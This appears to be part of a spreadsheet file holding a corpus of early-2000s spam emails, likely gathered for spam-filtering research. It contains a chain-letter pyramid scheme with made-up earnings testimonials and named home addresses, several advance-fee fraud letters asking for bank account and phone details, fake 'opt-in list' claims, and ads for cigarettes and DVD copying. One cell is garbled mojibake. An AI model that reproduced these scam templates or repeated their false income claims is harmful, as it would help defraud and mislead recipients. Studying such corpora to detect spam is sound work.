for Report! # 4. Whose 10,000 people send out 5,000 e-mails each for a 
total of 
50,000,000 (50 million) e-mails. The 0.2% response to that is 100,000 
orders for 
Report # 5 THAT'S 100,000 ORDERS TIMES $5 EACH=$500,000.00 (half 
million). 
Your total income in this example is: 1..... $50 + 2..... $500 
+ 3.....$5,000 + 4..... $50,000 + 5..... $500,000 ........ Grand 
Total=$555,550.00 
NUMBERS DO NOT LIE. GET A PENCIL &amp; PAPER AND FIGURE OUT THE 
WORST POSSIBLERESPONSES AND NO MATTER HOW YOU 
CALCULATE IT, YOU WILL STILL 
MAKE A LOT OF MONEY !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 
Advertising on the net is very very inexpensive and there are 
hundreds of FREE places to advertise. Placing a lot of free ads on the 
Internet will easily get a larger response. We strongly suggest you 
start with Method # 1and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 
REPORT #1 "The Insider's Guide to Advertising for Free on the Net" 
Order Report #1 from: 
K.Palludan 
9550 Summersweet Ct. 
Las Vegas, Nevada 89123 
USA 
________________________________________________________________
______ 
REPORT #2 "'The insider's Guide to Sending Bulk e-mail on the Net' 
Order Report #2 from: 
Kris Estes 
3055 Casey Drive #203 
Las Vegas, Nevada 89120 
________________________________________________________________
______ 
REPORT #3 "'Secret to Multilevel Marketing on the Net" 
Order Report #3 from : 
P. Clement 
601 St-Malo Est 
Ile Bizard, Quebec H9C2P2 
CANADA 
________________________________________________________________
______ 
REPORT #4 "'How to become a Millionaire Utilizing MLM and the Net" 
Order Report #4 from: 
David Carpenter 
13 Dutch lane 
Hazlet, New Jersey 07732 
USA 
________________________________________________________________
_____ 
REPORT #5 "'How to send out one Million e-mails for FREE" 
Order Report #5 from: 
S. Lasley 
4230 Edgewood Circle 
Idaho Falls, Idaho 83406 
USA 
________________________________________________________________
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 I have 
joined 
Jody in her ''hobby''. 
Mitchell Wolf M.D., Chicago, Illinois 
=========================================================
=======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 '' I had 
received this program before. I deleted it, but later I 
wondered if I should have given it a try. Of course, I had no idea who 
to contact ! to get another copy, so I had to wait until I was e-mailed 
again by someone else.........11 months passed then it luckily came 
again.....I did not delete this one! I made more than $490,000 on my 
first try and all the money came within 22 weeks''. 
Susan De Suza, New York, N.Y. 
=========================================================
====== 
'' It really is a great opportunity to make relatively easy money with 
little cost to you. I followed the simple instructions carefully and 
within 10 days the money started to come in. My first month I made 
$20,560.00 and by the end of third month my total cash count was $ 
362,840.00. Life is beautiful, Thanx to internet''. 
Fred Dellaca, Westport, New Zealand 
=========================================================
=======ORDER 
YOUR REPORTS TODAY AND GET STARTED ON YOUR ROAD TO 
FINANCIAL FREEDOM ! 
=========================================================
======= 
If you have any questions of the legality of this program, contact the 
Office of Associate Director for Marketing Practices, Federal Trade 
Commission, Bureau of Consumer Protection, Washington, D.C. 
=========================================================
======= 
THERE IS NO NEED TO RESPOND TO THIS E-MAIL IF YOU DO NOT 
WISH TO RECEIVE 
FURTHER CORRESPONDENCE. THIS IS A ONETIME E-MAIL. 
GOOD LUCK! </t>
  </si>
  <si>
    <t xml:space="preserve">Norton AD
Take
      Control of Your Computer With This Top-of-the-Line Software!Norton
            SystemWorks 2002  Software Suite
            -Professional Edition-
Includes
            Six - Yes 6! 
            - Feature-Packed UtilitiesALL for 1
            Special LOW
            Price of Only
            $29.99!
This
            Software Will:Â -
            Protect your computer from unwanted and  hazardous  virusesÂ -
            Help secure your private &amp; valuable informationÂ - Allow
            you to transfer files and send e-mails  safelyÂ -
            Backup your ALL your data quick and easilyÂ - Improve your
            PC's performance w/superior
            integral diagnostics!Â - You'll NEVER have to take your
            PC to the repair shop AGAIN!Â 
6
            Feature-Packed Utilities
            1
            Great Price 
            A $300+  
            Combined Retail Value
YOURS  for
            Only $29.99!&lt;
            Price Includes FREE
Shipping! &gt;And
            For a Limited time Buy Any 2 of Our Products &amp; Get 1 Free!
 Don't fall
    prey to destructive viruses or hackers!ProtectÂ  your computer and
    your valuable information and
-&gt;
            CLICK HERE to Order Yours NOW! &lt;-Your email
      address was obtained from an opt-in list. Opt-in UEFAS (United Email
      Federation Against Spam) Approved List - Â Purchase Code #
      34374064.Â Â If you wish to be unsubscribed from this list, please Click
      here . If you have previously unsubscribed and are still receiving
      this message, you may email our Spam
      Abuse Control Center. We do not condone spam in any shape or form.
      Thank You kindly for your cooperation.
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear zzzz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
Download Site    
      1Â Â Â Â Â  
      ( OR You Can Send Email ToÂ  130@95951.comÂ  
      For More Information AboutÂ  This Program )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
  </si>
  <si>
    <t xml:space="preserve">Copy
      ANY DVD with a CD-R Burner!
DVD Wizard Pro is the 
      most technologically advanced method of DVD reproduction ever available!
      Do not be fooled by other fly by night 
      websites offering outdated information.Our package will show you how to backup 
      any DVD or VHS cassette using a CD-R 
      burner! We will go further, and show you how to backup a DVD 
      using a DVD-R, or DVD-RW burner as well. 
Make quality backups 
      of your personal DVD's and VHS cassettes. Create your own
      DVD library. Never worry about 
      scratching or losing a DVD again! 
DVD 
      Wizard Pro is completely unlike anything our competitors 
      are offering, and it's fully guaranteed... Order Today, you won't be disappointed!Limited Time
Only $39.95!
We have sold this package 
      for as much as $69.95... but now, for a very limited time 
      only, we are offering instant access for only $39.95!
Â Go Here and 
      order a copy today
Â 
Â 
Your
      email address was obtained from an opt-in list. Opt-in MRSA List
      Â Purchase Code # 31212-1-01210.Â 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</si>
  <si>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fysibvcgjyuwinmyvbpjtaebsymyukbrkn</t>
  </si>
  <si>
    <t xml:space="preserve">Dear user,
CyberAge Dating Club is contacting you on behalf of Jenny.
You have been carefully chosen as a matching partner for the other party using 
  our advanced profile-matching system. We have determined that you do not currently 
  have an account with us and invite you to join. It's absolutely FREE and there's 
  no obligations or hidden charges. Come see for yourself and prepare to have 
  fun! 
Click here to Join 
  Now or simply disregard this request if you're not interested.
Sincerely yours,
  CyberAge Dating Club Staff.
</t>
  </si>
  <si>
    <t>IMPORTANT INFORMATION:The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(g1-ss2)5592OxeR3-424uQKh2259kCdl5-189GEil31</t>
  </si>
  <si>
    <t xml:space="preserve">
EBAY AUCTION NEWS
**
        Recommended Resource - Special Edition **
Monday, August 26th, 2002Multiple
        Streams of revenue using eBay and Internet: 
FREE Auction Profits Toolkit and
        FREE training class
(For the first 200 respondents)
You have
        been selected to participate in this FREE offer.         This eBay and Internet e-course, live web training
        conference, and Auction Profit Toolkit could easily sell
        for $297 - but it's yours absolutely FREE!
                This special FREE offer has been brought
        to you by your friends at eBay Auction News. Craig Meyer
        (The Auction Man) has agreed to provide you a free
        "live" training class that you won't
        want to miss.        You might say "Craig Meyer - the Auction Man?"
        That's because most of you remember Craig as the real estate
        guru who in 1997 helped over 2,000 families buy their own
        homes using little or none of their own money. Craig was
        featured on television programs throughout the country
        for this incredible effort. Craig is not one of those get
        rich quick gurus - but a guy who has helped families
        realize the American Dream - I will tell you Craig Meyer
        is the real deal!         Craig and his staff have
        invested hundreds of thousands of dollars and thousands
        of hours testing, testing and more testing - Craig has
        developed an incredible system for making Big Money using
        eBay and the Internet This system will be revealed to you
        in - Craig's brand new live Online Conference - Craig is
        providing a limited number of eBay Auction News subscribers
        the opportunity to attend this conference for FREE!
        Register for the class:
        CLICK HERE #1 Free "live" Online training class -
        Craig Meyer's Multiple Streams of revenue using eBay and
        the Internet! 
Sessions
                Start: Â 
8/28/2002 - 5:00pm PST - 6:30pm PST
Â 
9/02/2002 - 9:00am PST - 10:30am PST
Â 
9/03/2002 - 5:00pm PST - 6:30pm PST
Â 
9/05/2002 - 9:00am PST - 10:30am PST
Â 
9/09/2002 - 9:00am PST - 10:30am PST
Â 
9/10/2002 - 5:00pm PST - 6:30pm PST
Â 
Pre-recorded Class (anytime)This is
        the live online training class that Started it all ... This
        class can help YOU learn how to Create Multiple Streams
        of eBay and internet revenue for LIFE! This
        course is personally taught online by Craig Meyer
        HIMSELF! PLUS, when you attend, you will get: The Entire
        Auction Profits Toolkit absolutely FREE! A $297 Value!         Just think about it ... you will have personal and
        individual training! Craig will be teaching you all of
        his proven, successful, and profitable wealth secrets -
        LIVE, interactive, intense and jam packed with
        information!         Plus - During Craig's live online class he will reveal
        the secret to making $12,000 in the next 30 days - No
        Hype, I promise this is the real deal - you don't want to
        miss this conference so respond right now! Are you interested in Financial Freedom? 
        Are you interested in having Multiple Streams of Income? 
        Are you willing to work with Craig personally to achieve
        these goals? 
        Are you ready to the Auction Profit Toolkit and training class FREE? If SO,
        Just go to the registration page: 
CLICK HERE
                Get registered now! You'll receive a confirmation email
        immediately after you register. 
KEEP THE CONFIRMATION EMAIL HANDY! It
        contains all the codes and access numbers to view the
        program on your PC and get on the call!         This conference will be sold out - actually since the
        entire program is free It will simply fill up - once it
        is full - it's full - to guarantee your participation
        register right now! HERE IS HOW YOU
        REGISTER &amp; LOCK IN YOUR POSITION:
You have to
        go to this website: 
CLICK HERE Be sure to do it NOW - the web conference and auction profits course are going to go QUICKLY ... and I don't want
        you to miss out!         Sincerely,         Taylor Brooks 
        eBay Auction News
To be removed,
        CLICK HERE
</t>
  </si>
  <si>
    <t xml:space="preserve">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 
					Please click here http://65.19.137.17/nextresearch/nr.htm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901.491.4995 with any questions.  To unsubscribe from this list, simply reply to this email to be removed from future invitations to participate. 
					Thank you again for your consideration,
NextResearch 
					(http://www.nextresearch.com)
Link to survey: http://65.19.137.17/nextresearch/nr.htm
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Partner to be,First, I must apologise to you for using this medium to communicate to you
about this project.I am a highly placed official of  Government of Nigeria and also a
founding member of the ruling party in Power now,the Peoples Democratic
Party(PDP).My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supervision.The fund is presently waiting in the Government Account named CBN/FGN
INDEPENDENT REVENUE account number 400-939134 with J.P.MORGAN CHASE
BANK,New York.You can do your independent verifictaion of this. However,
by virtue of our  position as civil servants and members of the NDDC, we
cannot acquire this funds in our name. This is because as top civil
servants, we are not allowed by law of the land to own or operate bank
accounts outside our country for now.I have been delegated as a matter of trust by my colleagues,
to look for an overseas partner in whose account we would
transfer the fundHence the reason for this mail.We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away.For your support and partnership,please reply me to negotiate your fees or
the percentage you wish to be paid when the funds arrive your bank account.You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over.The transaction, although discrete, is legitimate and there
is no risk or legal disadvantages either to ourselves or yourself now or
in the future as we have put in place perfect mchineries that will ensure
a hitch free transfer into your account upon acceptance.The transfer will be effected to your account within ten-fourteen
(10-14) working days as soon as we reach an agreement and you furnish
me with a  suitable bank account and company name and address with all
your contact numbers including fax number.I am looking forward to doing business with you and do solicit
your confidentiality in this transaction,  Please mail your
response to me.Yours faithfully,
Anderson K. Eseimoku
 </t>
  </si>
  <si>
    <t>ATTN:I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re-election.All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confidential.NOTE: DO REPLY TO bulmulete@golfemail.com
God bless you indeed as you help yourself and us.Mr. BULAWA  MULETE JR
 -- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t xml:space="preserve">
Copyright 2002 - All rights reservedIf you would no longer like us 
to contact you or feel that you havereceived this email in error, 
please click here 
to unsubscribe.
</t>
  </si>
  <si>
    <t xml:space="preserve">
Beautiful,Custom Websites for $349 Complete!
Beautiful, 100% Custom 
      Websites, $349 Complete!
Get a beautiful, 100% Custom Web Site (or 
                        yours redesigned)Â for only 
                        $349!*We have references coast to 
                        coastÂ and will give you plenty of sites to 
                        view!
Includes up to 
                  7 pages (you can add more), java rollover buttons, feedback 
                  forms, more. It will be constructed to your taste and 
                  specifications. We do not use templates,Â  our sites 
                  are completely custom.Â Â Â  *Must host with us @ 
                  $19.95/mo (100 Megs, 20 Email accounts, Control Panel, Front 
                  Page, Graphical Statistics, 
                  more).Â 
For sites to 
                  view, complete below or call our message center at 
                  321-726-2209 (24 hours). Your call will be returned 
                  promptly.NOTE:Â Â  If you are using a web 
                  based email program (such as Yahoo, Hotmail, etc.) the form 
                  below will not work.Â  Instead of using the 
                  form,Â  CLICK 
                  HERE .Â Â Â  Name: Phone 
                  w/AC*:State: Type Project: New Site:Redesign Flash Intro/bannerÂ Â  Current 
                  site?:Comments:Â Â If you do not wish to 
            receive our messages, CLICK 
            HERE Â  (Please enter 
            ALL email addresses (in the body of the message) you wish to have 
            eliminated from future 
        mailings.[3423HzRl2-702DvNh8963ZrLd3-312VpIa7473UmEw3-824QiA@47]
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear sir,,
My name is DR Steven M Duba ,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presidentï¿½s supporters invaded my
fatherï¿½s farm, burnt everything in the farm, arrested
him and confiscated all his investment.Early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March,2002.Now my stay here in Africa is frustrating and
depressing because my fatherï¿½s lawyer is presently
hospitalized in London due to terrible heart problem;
though the lodgment documents are with me, as such I
want to relocate to your country for good. Presently,
my residence permit here in South Africa is an Asylum
permit as a refugee.I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wouldnï¿½t want anything that will expose me, and the
existence of this money.Your urgent response will be highly appreciated.Sincerely yours,STEVEN DUBA (DR).TEL:27-83-713-2696
__________________________________________________
Do You Yahoo!?
Yahoo! Finance - Get real-time stock quotes
http://finance.yahoo.com
</t>
  </si>
  <si>
    <t>Hi Job Seeker,When you create a FREE My Net-Temps account, you have access to the tools
and resources for finding your next job more effectively.  It only takes
a minute. Plus you get news and tips specific to your profession.Everything you need is in your My Net-Temps account!*  Post up to 3 resumes with the Build My Resume and Copy &amp; Paste tools
*  Setup custom search agents to automatically receive job leads
*  Resume statistics to track your success
*  Resume, cover letter and thank you letter writing tips
*  Salary calculator
*  Career articles and weekly newsletter
*  Access to over 7500 recruiters that can help your job searchSetup your account now at http://www.net-temps.com/careerdev/The Net-Temps Team
www.net-temps.com</t>
  </si>
  <si>
    <t>Dear Sir or Madam,My name is Petr Stanek and I am managing the free trial 
subscription program at the European Internet Network (EIN).  EIN publishes hourly updated breaking news headlines and other 
important information from 200 countries and regions. During September, you and your associates can have a 
FREE TRIAL SUBSCRIPTION to the EIN DELUXE Edition.You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http://www.europeaninternet.com/mediakit/If you have any questions, comments, or need assistance  
signing up, please contact us personally by either writing to 
helpdesk@europeaninternet.com or simply replying to this email. Please feel free to forward this offer to any of your colleagues. Best regards,Petr Stanek
Subscription Department
EIN News
http://www.einnews.com
To be removed please reply to: remove@europeaninternet.com</t>
  </si>
  <si>
    <t xml:space="preserve">Dear friend,I am Mrs. Sese-seko widow of late President Mobutu Sese-seko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Coted'ivoire where my family and I settled, while we later moved to settled in Morroco where my husband later died of cancer disease. However, due to this situation we decided to change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confiscated.I have deposited the sum Eighteen Million United State
Dollars (US$18,000,000,00.)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revealed.I will also want to acquire real/landed properties and
stock in multi-national companies and to engage in other safe and non-speculative investments as adviseby your good self. May I at this point emphasize the high level of
confidentiality, which this upcoming project demands,and hope you will not betray the trust and
confidence, which I repose in you.In conclusion, if you want to assist us, my son (Kongolo) shall divulgeto you all briefs regarding this project, tell you where
the funds are currently being maintained and also discuss remuneration for your services.For this reason kindly furnish us your contact information,that is your personal telephone and fax number for validation purpose and acknowledge receipt of this mail using the above email address.Yours sincerely,Mrs. Mariam M. Seseseko.-- 
Irish Linux Users' Group Social Events: social@linux.ie
http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve"> 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I_x0011_ opposition radicale et ses allies (USORAL) to buy arms
with US $200m on 5th January 2001; for him to finalized the arm_x0012_s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Irish Linux Users' Group Social Events: social@linux.ie
http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>Dear zzzzason.org,My name is Andy Koh, the Business Development Manager for FriendSearch.com.
Could you please forward this to the person in charge of new partnerships and
advertising.FriendSearch currently powers web personals and love sites for over 10,000
partners on the web, across over 200 countries.  Some of our partners include
AllCommunity.com, CariKawan.com, HotPlugins.com, Free-Banners.com and much
more.  Over the months, our partners have been pleasantly surprised to find
that we are steadily earning them significant revenue streams, month after month.We are looking to advertise/partner with you to provide you with:- 100% customizable friendsearch personals plug-in
- steady income stream with 50% revenue share (earn up to $12.50/month/member)
- Interactive content which will capture your audience's attention for at least 20 minutes
- Private branding, co-branding, or your own hosted domain/site.
- Fast, 15 minutes setup, fully automatic!
- Zero setup fee, absolutely no charges and payments requiredTo view an example of a fully customized personals using Friendsearch, go to
http://www.carikawan.com/ which has become Malaysia's largest web personals
and have received lots of media attention.  All it took was a few minutes to set up.In fact, I have taken the effort to create a partner account for you.Click below and you'll be taken to your control panel where you can customize
your own Friendsearch Personals Plug-In.http://www.ezernet.com/b2b-domain.cgi?id=62898&amp;dname=zzzzason.org
Please try out your account or contact me if you have further questions, or
if you have any other ideas on how we can partner up.
Best Regards,Andy Koh,
FriendSearch.com
Business Development Manager
If you do not wish to have this account, click below to remove it entirely.
http://www.ezernet.com/b2b-remove.cgi?id=62898&amp;dname=zzzzason.org</t>
  </si>
  <si>
    <t>Targeted email marketing works!  There's no way around it.
No other medium let's you share your offer with more 
people for less than the cost of a small classified ad.We can supply valid targeted emails according 
to your requirements, which are compiled only on your order, such as region/country/field/keyword/ 
occupation/Domain Name (like AOL.com) etc.Free membership
Signup today at http://61.151.247.41
Limited membershipThis is a one time message, you will not be emailed again.</t>
  </si>
  <si>
    <t xml:space="preserve">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 
					Please click here http://65.19.137.17/nextresearch/NR.htm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jchoate@newyork.com with any questions.  To unsubscribe from this list, simply reply to this email with subject "UNSUBSCRIBE" to be removed from future invitations to participate. 
					Thank you again for your consideration,
NextResearchLink to survey: http://65.19.137.17/nextresearch/nr.htm
</t>
  </si>
  <si>
    <t>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t>
  </si>
  <si>
    <t xml:space="preserve"> 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I_x0011_ opposition radicale et ses allies (USORAL) to buy arms
with US $200m on 5th January 2001; for him to finalized the arm_x0012_s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Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>NIGERIA ELECTIRC POWER AUTHORITY 
FEDERAL SECRETARIAT 
IKOYI-LAGOS.FROM THE DESK OF:George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Dollars.{US$71,500,000.00}. This sum 
(US$71.5M) is an over 
invoice contract sum which is currently in an offshore payment account of the Central Bank 
of Nigeria as an 
unclaimed contract entitlement which can easily be withdrawn or drafted or pay to any 
recommended 
beneficiary by my committee.On this note, you will be presented as a contractor to NEPA who has executed a contract 
to a tune of the
above sum and has not been paid. 
Proposed Sharing Partern (%): 1. 70% for me and my colleagues. 2. 20% for you as a partner/fronting for us.3. 10% for expenses that may be incurred by both parties during the cause of this 
transacton.Our law prohibits a civil servant from operating a foreign account, hence we are contacting 
you. If this
proposal satisfies you, do respon as soon as possible with the following information: 1. The name you wish to use as the beneficiary of the fund. 2. Your Confidential Phone and Fax Numbers. Further discussion will be centered on how the fund shall be transfer and full details on how 
to accomplish this 
great opportunity of ours.Thank you and God bless. Best regards, 
George Osawa -- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t xml:space="preserve">Dear User,Do you ever wish you could easily call people you know in other countries
for up to 85% less than standard call prices?! And then to make these savings
without having to subscribe to any low cost calling service?! We have now
launched a product that does exactly that!You can now call people in most popular destinations around the world for
only 33 cents per minute! There are no hidden charges, you do not need to
signup, use any credit cards, or pay any extra bills! You can try this
service at no risk and choose to use it with no commitment!To use this new service, simply dial our access number 1530 927 055 and
once connected, dial the actual international number you wish to call.For more information and the current list of countries you can call, 
please check our website http://www.ireland.pd-dial.com/Example: If you wanted to call a German number 0567 123 124 you would:1) Dial 1 530 927 055
2) Wait until you connect to our system and hear a message asking you
   to dial the number you wish to call.
3) Dial the full international number starting 00. In this instance 00
   (for international) 49 (country code for Germany) 567 123 124 (their
   number without the initial zero)You will only pay 33 cents per minute to access our system with no further
charges for any calls you make! You can also use this service to make
cheap international calls from mobiles too! However please check the
costs of calling 1530 numbers from your mobile if you are unsure.You only ever pay for the cost of calling our access number which will
appear on your normal bill. However any international calls you make will
not appear on your bill, so you only ever pay 33 cents per minute when
using our service!If calling from a mobile, please ensure that you do not press the green/send
key again after dialling the actual mobile number, or you will be billed
for a second call by your mobile operator.If you have any questions or wish to contact us for more information, 
please check our website http://www.ireland.pd-dial.com/ for details.If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
</t>
  </si>
  <si>
    <t xml:space="preserve">
Dear Sir or MadamIn the past you have requested information on discounted products. We hope that you find this of interest. If you are not a smoker, and find this email offensive, we sincerely apologise!  We will be only too happy to take you off our mailing list.If you are a smoker, however, and are fed up with paying high prices for your cigarettes and tobacco, take a look at what we have to offer  by clicking on this link.
http://www.smokersunited.co.uk/?S=15&amp;ID=2We can send you, legally, by registered air mail, direct to your door, 4 cartons of cigarettes or 40 pouches of rolling tobacco (all brands are available) from only 170 Euros - about 105 pounds - fully inclusive of postage and packing.  Why pay more?To remove yourself from our mailing list, please click below
mailto:smokersclub@terra.esYours faithfully.
Smokers United
http://www.smokersunited.co.uk/?S=15&amp;ID=2xay1y
</t>
  </si>
  <si>
    <t xml:space="preserve">
Dear Sir or MadamIn the past you have requested information on discounted products. We hope that you find this of interest. If you are not a smoker, and find this email offensive, we sincerely apologise!  We will be only too happy to take you off our mailing list.If you are a smoker, however, and are fed up with paying high prices for your cigarettes and tobacco, take a look at what we have to offer  by clicking on this link.
http://www.smokersunited.co.uk/?S=24&amp;ID=2We can send you, legally, by registered air mail, direct to your door, 4 cartons of cigarettes or 40 pouches of rolling tobacco (all brands are available) from only 170 Euros - about 105 pounds - fully inclusive of postage and packing.  Why pay more?To remove yourself from our mailing list, please click below
mailto:smokersclub@terra.esYours faithfully.
Smokers United
http://www.smokersunited.co.uk/?S=24&amp;ID=2xay1y
</t>
  </si>
  <si>
    <t xml:space="preserve">                          **********************
                              ï¿½ï¿½ï¿½ï¿½ï¿½~ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½Xï¿½ï¿½  
                          **********************
   ï¿½Mï¿½ï¿½ï¿½Aï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½Hï¿½C   ï¿½xï¿½_ï¿½Uï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½Aï¿½Aï¿½Xï¿½Uï¿½ï¿½ï¿½ï¿½ï¿½~ï¿½ï¿½ï¿½Dï¿½Iï¿½I   ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½Zï¿½qï¿½ï¿½ï¿½ï¿½ï¿½Tï¿½Bï¿½ï¿½ï¿½ï¿½ï¿½hï¿½ï¿½ï¿½Yï¿½nï¿½Xï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½Aï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½zï¿½ï¿½ï¿½Dï¿½ï¿½ï¿½A
   ï¿½@ï¿½wï¿½nï¿½ï¿½ï¿½zï¿½ï¿½ï¿½ï¿½ï¿½@ï¿½Bï¿½ï¿½ï¿½Aï¿½Xï¿½zï¿½ï¿½ï¿½{ï¿½zï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½Iï¿½Iï¿½Iï¿½I
   ï¿½|ï¿½ï¿½ï¿½pï¿½Uï¿½G   ï¿½ï¿½ï¿½ï¿½ï¿½G   ï¿½jï¿½wï¿½ï¿½ï¿½G ï¿½ï¿½ï¿½Rï¿½ï¿½ï¿½Bï¿½ï¿½ï¿½ï¿½ï¿½nï¿½Bï¿½_ï¿½ï¿½
            50-300ï¿½Wï¿½]ï¿½ï¿½ï¿½ï¿½1200-2500ï¿½ï¿½ï¿½^ï¿½B           
            ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½jï¿½ï¿½ï¿½Aï¿½{ï¿½ï¿½ï¿½ï¿½ï¿½Uï¿½ï¿½ï¿½Cï¿½]ï¿½Kï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½^ï¿½B
            ï¿½ï¿½ï¿½Wï¿½iï¿½ï¿½ï¿½ï¿½ 
   ï¿½Hï¿½qï¿½ï¿½ï¿½G ï¿½Hï¿½qï¿½ï¿½ï¿½@ï¿½Bï¿½Gï¿½Bï¿½Tï¿½Bï¿½|ï¿½Bï¿½ï¿½ï¿½qï¿½C 
            30-500ï¿½Wï¿½]1200-2100ï¿½ï¿½ï¿½^
            ï¿½ï¿½ï¿½sï¿½ï¿½ï¿½ï¿½ï¿½jï¿½ï¿½ï¿½Bï¿½ï¿½ï¿½ï¿½ï¿½Bï¿½ï¿½ï¿½fï¿½Bï¿½ï¿½ï¿½qï¿½ï¿½ï¿½K
           ï¿½]ï¿½ï¿½ï¿½ï¿½ï¿½Xï¿½zï¿½Bï¿½iï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½^   ï¿½Qï¿½sï¿½ï¿½ï¿½G ï¿½nï¿½ï¿½ï¿½Fï¿½ï¿½ï¿½Tï¿½Bï¿½|ï¿½Bï¿½ï¿½ï¿½Bï¿½q
            30-450ï¿½Wï¿½]ï¿½ï¿½ï¿½ï¿½1000-1800ï¿½ï¿½ï¿½^
            ï¿½ï¿½ï¿½ï¿½ï¿½Bï¿½ï¿½ï¿½[ï¿½ï¿½ï¿½ï¿½                 ï¿½ï¿½ï¿½sï¿½ï¿½ï¿½G ï¿½Qï¿½ï¿½ï¿½ï¿½ï¿½Bï¿½ï¿½ï¿½wï¿½Fï¿½ï¿½ï¿½Aï¿½ï¿½ï¿½sï¿½_ï¿½ï¿½  
            70ï¿½w400ï¿½Wï¿½]ï¿½ï¿½ï¿½ï¿½1000-2200ï¿½ï¿½ï¿½^
            ï¿½ï¿½ï¿½ï¿½ï¿½Bï¿½{ï¿½ï¿½ï¿½ï¿½ï¿½C   ï¿½ï¿½  ï¿½ï¿½ï¿½G ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½Bï¿½]ï¿½eï¿½ï¿½ï¿½Bï¿½ï¿½ï¿½wï¿½ï¿½ï¿½Bï¿½ï¿½ï¿½ï¿½ï¿½ï¿½
            50-500ï¿½W
            ï¿½ï¿½ï¿½Uï¿½ï¿½ï¿½Cï¿½Bï¿½Kï¿½yï¿½Xï¿½ï¿½ï¿½]ï¿½wï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½^   ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½G ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½
            80-500ï¿½W1300ï¿½ï¿½ï¿½_ï¿½Cï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½}ï¿½ï¿½
            ï¿½ï¿½ï¿½sï¿½ï¿½ï¿½ï¿½ï¿½jï¿½ï¿½ï¿½Bï¿½{ï¿½ï¿½ï¿½ï¿½ï¿½Cï¿½Bï¿½ï¿½ï¿½Wï¿½iï¿½ï¿½ï¿½ï¿½
    ï¿½Aï¿½ï¿½ï¿½ï¿½ï¿½@ï¿½Aï¿½~ï¿½ï¿½ï¿½Oï¿½ï¿½ï¿½Cï¿½wï¿½ï¿½ï¿½ï¿½ï¿½ï¿½.
   ï¿½ï¿½ï¿½Tï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½
  ï¿½pï¿½ï¿½ï¿½Hï¿½Gï¿½ï¿½ï¿½pï¿½j ï¿½qï¿½W
  TeLï¿½]ï¿½Nï¿½ï¿½ï¿½ï¿½ï¿½^ï¿½G 02-27492314
  ï¿½ï¿½ï¿½ï¿½ï¿½qï¿½ï¿½ï¿½G0937063831
  ï¿½zï¿½ï¿½ï¿½ï¿½ï¿½Nï¿½Aï¿½Oï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½Nï¿½Iï¿½Iï¿½Iï¿½I  -- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">
GREEN CARD
function Go() 
{
window.location="http://www.yesilkart.org/index.php?Who=19";
}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
</t>
  </si>
  <si>
    <t xml:space="preserve"> 
Sent e-mail message   
From: enenkio@webtv.net (Robertï¿½Moore) Date: Thu, Sep 5, 2002, 8:36am To: UlafalaA@forumsec.org.fj Subject: HAWAI`I &amp; ENENKIO KINGDOMS AMERICANS SHAME ! 
Sent e-mail message 
From: enenkio@webtv.net (Robertï¿½Moore) Date: Thu, Sep 5, 2002, 4:10am
To: webmaster@cwis.org Subject: HAWAI`I &amp; ENENKIO KINGDOMS AMERICANS 
SHAME !
Sent e-mail message 
From: enenkio@webtv.net (Robertï¿½Moore) Date: Tue, Sep 3, 2002, 6:55pm
To: rbernardo@starbulletin.com Subject: Hawaii &amp; EnenKio Kingdoms 
Americans Shame !
Sent e-mail message 
From: enenkio@webtv.net (Robertï¿½Moore) Date: Thu, Aug 29, 2002, 
10:05am To: doswork@uic.edu Subject: HAWAI`I &amp; ENENKIO KINGDOMS AMERICANS SHAME ! 
Sent e-mail message 
From: enenkio@webtv.net (Robertï¿½Moore) Date: Mon, Aug 26, 2002, 4:12pm
To: web@jefren.com Subject: HAWAI`I &amp; ENENKIO KINGDOMS AMERICANS SHAME ! 
